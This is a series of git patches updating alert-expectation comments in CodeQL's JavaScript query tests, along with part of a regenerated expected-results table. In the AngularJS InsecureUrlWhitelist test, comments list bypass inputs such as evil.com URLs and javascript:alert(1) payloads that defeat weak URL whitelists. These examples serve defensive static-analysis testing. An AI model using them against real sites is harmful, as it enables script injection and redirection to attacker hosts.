a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index d698b7d1c29e..a629ae06320d 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -2,32 +2,32 @@ function getLastLine(input) { var lines = [], nextLine; while ((nextLine = readNextLine(input))) lines.push(nextLine); - if (!lines) + if (!lines) // $ Alert throw new Error("No lines!"); return lines[lines.length-1]; } function lookup(cache, k) { var v; - return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); + return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); // $ Alert } function test(a, b) { if (!a && !b) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } if (!(a || b)) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } var x = new X(); - if(x){} - if (new X()){} - if((x)){} - if(((x))){} - if ((new X())){} + if(x){} // $ Alert + if (new X()){} // $ Alert + if((x)){} // $ Alert + if(((x))){} // $ Alert + if ((new X())){} // $ Alert x = 0n; if (x) // $ Alert @@ -51,7 +51,7 @@ async function awaitFlow(){ var known = knownF(); if (known) return; - if (known) + if (known) // $ Alert return; var unknown = unknownF(); @@ -86,7 +86,7 @@ async function awaitFlow(){ }); (function() { - if ((x, true)); + if ((x, true)); // $ Alert }); (function (x, y) { From 507a0918ad68dc79025ca220b165089e317d1a39 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:00:09 +0100 Subject: [PATCH 078/115] JS: More alert updates in UselessConditional --- .../UselessConditional/UselessConditional.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index a629ae06320d..edba36470508 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -67,7 +67,7 @@ async function awaitFlow(){ (function() { function f1(x) { - x || y // $ Alert - but whitelisted + x || y // OK } f1(true); @@ -79,7 +79,7 @@ async function awaitFlow(){ function f3(x) { (function(){ - x || y // $ Alert - but whitelisted + x || y // OK }); } f3(true); @@ -150,7 +150,7 @@ async function awaitFlow(){ var v = p(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -165,7 +165,7 @@ async function awaitFlow(){ var v = findOrThrow(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -180,7 +180,7 @@ async function awaitFlow(){ (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // $ Alert - but whitelisted + if (!x && something()) { // OK something(); } }); From 7623ebb13bf67dcd925881a0344f6a5d69d8fa24 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:01:07 +0100 Subject: [PATCH 079/115] JS: Accept changes in UseOfReturnlessFunction --- .../query-tests/Statements/UseOfReturnlessFunction/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7f4296932d96..37da0c7e2a6a 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -21,7 +21,7 @@ var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. - var b = onlySideEffects(); + var b = onlySideEffects(); // $ Alert console.log(b); var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert + var e = myObj.onlySideEffects.apply(this, arguments); // $ MISSING: Alert console.log(e); function onlySideEffects2() { From 6cf1334c6d6df6149aca85d5945983af69377c12 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 08:59:27 +0100 Subject: [PATCH 080/115] Fix comment style in UnboundEventHandlerReceiver --- .../Expressions/UnboundEventHandlerReceiver/tst.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js index e129865af56f..f6039b673435 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js @@ -24,9 +24,9 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
-
// $ Alert -
// $ Alert -
// $ Alert +
{ /* $ Alert */ } +
{ /* $ Alert */ } +
{ /* $ Alert */ }
From 2b33ed367167bb4f91d160c8642f269ed06e47f3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:17:03 +0100 Subject: [PATCH 081/115] JS: Remove incorrect alert marker --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index b5a8481305e9..5e8bc71a92ff 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // $ Alert - explicitly disabled + var safe_used = { // explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, From a1c13f02be912a59eeaf5b61120436ecb20dc20c Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:19:27 +0100 Subject: [PATCH 082/115] JS: Remove alert marker that's reported on another line We had two 'NOT OK' comments for the same alert. The alert appears on the 'pref' object above. --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e8bc71a92ff..e002845d7995 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -26,7 +26,7 @@ function test() { sandbox: true }; // $ Alert - var options_2 = { // $ Alert - implicitly enabled + var options_2 = { webPreferences: pref, show: true, frame: true, From dc28bb527bbe2852dfd702e0bf65b4684a02436e Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:21:41 +0100 Subject: [PATCH 083/115] JS: Fix alert location and use RelatedLocation in InsecureUrlWhitelist --- .../AngularJS/InsecureUrlWhitelist/tst.js | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 6ede37fed7cc..1ee742c6d6a2 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,11 +1,11 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a - "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com - "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD + "**://example.com/*", // $ RelatedLocation - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ RelatedLocation - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ RelatedLocation - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ RelatedLocation - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ RelatedLocation - exploit: https://example.UnexpectedTLD "https://example.com", "https://example.com/**", @@ -19,6 +19,6 @@ angular.module('myApp', []) "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // $ Alert - (exploit http://wwwaexample.org (dots are not escaped)) - ]); + /http:\/\/www.example.org/g // $ MISSING: RelatedLocation - (exploit http://wwwaexample.org (dots are not escaped)) + ]); // $ Alert }); From 605999454acf161f3056967f5e00d4b9d5d95e17 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 12:52:06 +0100 Subject: [PATCH 084/115] JS: Accept more results in SpuriousArguments --- .../LanguageFeatures/SpuriousArguments/reflection.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js index 41f312bd0791..ac2df0dafdce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js @@ -4,7 +4,7 @@ function f1(x) {return;} f0.call(); f0.call(this); f0.call(this, 1); // $ Alert -f0.call(this, 1, 2); +f0.call(this, 1, 2); // $ Alert f1.call(); f1.call(this); From 87ed86e4fdb3e8af624a9ad7c27a8be9462550ab Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 17:12:53 +0100 Subject: [PATCH 085/115] JS: Update UnusedOrUndefinedStateProperty Using RelatedLocations to add clarity --- .../Expressions/ImplicitOperandConversion/tst.js | 2 +- .../test/query-tests/Expressions/MissingAwait/tst.js | 2 +- .../Expressions/SuspiciousInvocation/eval.js | 2 +- .../LanguageFeatures/IllegalInvocation/tst.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/issue7506.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/undefined.js | 10 +++++----- .../React/UnusedOrUndefinedStateProperty/unused.js | 10 +++++----- 7 files changed, 17 insertions(+), 17 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index fe1e7d6924b0..a72dc333dac5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -74,7 +74,7 @@ function l() { x ** 2; // $ Alert } -1n + 1; // $ MISSED: Alert +1n + 1; // $ MISSING: Alert (function(){ let sum = 0; diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 28e95513d401..61f599a6c33d 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -59,7 +59,7 @@ function useThingPossiblySync(b) { if (thing == null) {} - return thing + "bar"; // $ MISSED: Alert + return thing + "bar"; // $ MISSING: Alert } function useThingInVoid() { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js index 2cf1e74a33eb..db14aca9ea65 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js @@ -6,7 +6,7 @@ function foo() { function bar() { var g; - g(); // $ MISSED: Alert + g(); // $ MISSING: Alert eval("g = alert"); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 1ffb7a489c8e..48af86687794 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -12,7 +12,7 @@ let c = new C(); C(); // $ Alert new (x=>x); // $ Alert c.m(); -new c.m(); // $ MISSED: Alert +new c.m(); // $ MISSING: Alert var o = { f: function() {}, @@ -21,7 +21,7 @@ var o = { o.f(); new o.f(); o.g(); -new o.g(); // $ MISSED: Alert +new o.g(); // $ MISSING: Alert function f(b) { var g; diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js index f5acdc8d99ab..07932d220d65 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js @@ -9,10 +9,10 @@ class C1 extends React.Component { } } -class C2 extends React.Component { +class C2 extends React.Component { // $ Alert state = { - p1: '' + p1: '' // $ RelatedLocation } static getDerivedStateFromProps_unmodeled(props, state) { diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index afc4f61b083c..96ffb02f8b0b 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -1,12 +1,12 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.writtenDirectly = 42; this.setState({ writtenInSetState: 42 }); this.state.writtenInOtherMethod; - this.state.notWritten; // $ Alert - this.state.notWrittenButReadInChain; // $ Alert + this.state.notWritten; // $ RelatedLocation + this.state.notWrittenButReadInChain; // $ RelatedLocation this.state.writtenDirectly; this.state.writtenInSetState; @@ -29,10 +29,10 @@ class C2 extends React.Component { } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.writtenThrougExternalPropertyAccess; - this.state.notWrittenThrougExternalPropertyAccess; // $ Alert + this.state.notWrittenThrougExternalPropertyAccess; // $ RelatedLocation } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d2ff35967673..9c4e5441167a 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.readDirectly = 42; this.state.readInChain = {}; this.state.readInOtherMethod = {}; - this.state.notRead = 42; // $ Alert + this.state.notRead = 42; // $ RelatedLocation this.state.readDirectly; this.state.readInChain.foo; } @@ -18,16 +18,16 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ Alert + this.state.readWhenEscaped = 42; // $ MISSING: Alert f(this.state); } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.readThrougExternaPropertyAccess = 42; - this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert + this.state.notReadThrougExternaPropertyAccess = 42; // $ RelatedLocation } } From 8ef51c495fd22fab4ff2315944151073830d4888 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:24 +0100 Subject: [PATCH 086/115] JS: Fix wrong expectation in UnusedOrUndefinedStateProperty --- .../query-tests/React/UnusedOrUndefinedStateProperty/unused.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index 9c4e5441167a..60673a23b620 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ MISSING: Alert + this.state.readWhenEscaped = 42; f(this.state); } } From aade1e863d82329042550215a83ed3e53f392e6b Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:38 +0100 Subject: [PATCH 087/115] JS: Add a related location in UnusedOrUndefinedStateProperty --- .../React/UnusedOrUndefinedStateProperty/undefined.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 96ffb02f8b0b..165ab793ac71 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -61,7 +61,7 @@ new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ // $ Alert render: function() { this.state.writtenInKnownInitializerObject; - this.state.notWrittenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ RelatedLocation return
; }, getInitialState: function() { From 0496de6c8f9c561182cb0b46fa3ee3ac19c0183d Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:29 +0100 Subject: [PATCH 088/115] JS: Accept alerts in UselessCharacterEscape --- .../UselessCharacterEscape/tst-escapes.js | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index 3df355052a55..f776c9d40e68 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -10,12 +10,12 @@ RegExp("{}\"|<>?"); RegExp(" "); // backslashes -RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); -RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); -RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); +RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); // $ Alert +RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); // $ Alert +RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); // $ Alert RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert RegExp("\[\]\'\\,\.\/"); // $ Alert -RegExp("\{\}\\\"\|\<\>\?"); +RegExp("\{\}\\\"\|\<\>\?"); // $ Alert RegExp("\ "); /\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/; /\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z/; @@ -57,17 +57,17 @@ RegExp("[\.]"); // $ Alert RegExp("a[b\.c]d"); // $ Alert RegExp("\b"); RegExp(`\b`); -RegExp(`\k\\k\d\\d`) -RegExp(`\k\\k${foo}\d\\d`) +RegExp(`\k\\k\d\\d`) // $ Alert +RegExp(`\k\\k${foo}\d\\d`) // $ Alert // effective escapes -RegExp("\]") +RegExp("\]") // $ Alert RegExp("\\]") RegExp("\\\]"); // effectively escaped after all RegExp("x\\\]"); // effectively escaped after all RegExp("\\\\]") -RegExp("\\\\\]") +RegExp("\\\\\]") // $ Alert RegExp("\\\\\\]") RegExp("\\\\\\\]") // effectively escaped after all RegExp("\\\\\\\\]") -RegExp("\\\\\\\\\]") +RegExp("\\\\\\\\\]") // $ Alert From bb67a0e9b09175c4a56fb1bd0ec40ccfdc46685e Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:53 +0100 Subject: [PATCH 089/115] JS: Remove outdated comment --- .../UselessCharacterEscape.expected | 118 +++++++++--------- .../UselessCharacterEscape/tst-escapes.js | 2 - 2 files changed, 59 insertions(+), 61 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected index 6cd6e27b0edc..b3c764e85cbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected @@ -1,59 +1,59 @@ -| tst-escapes.js:19:8:19:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | -| tst-escapes.js:24:1:24:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | -| tst-escapes.js:26:1:26:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:29:8:29:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:31:8:31:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:33:8:33:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:35:8:35:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:37:8:37:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:42:1:42:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | -| tst-escapes.js:48:8:48:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:50:8:50:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:66:8:66:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:67:8:67:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:71:8:71:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:17:8:17:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... 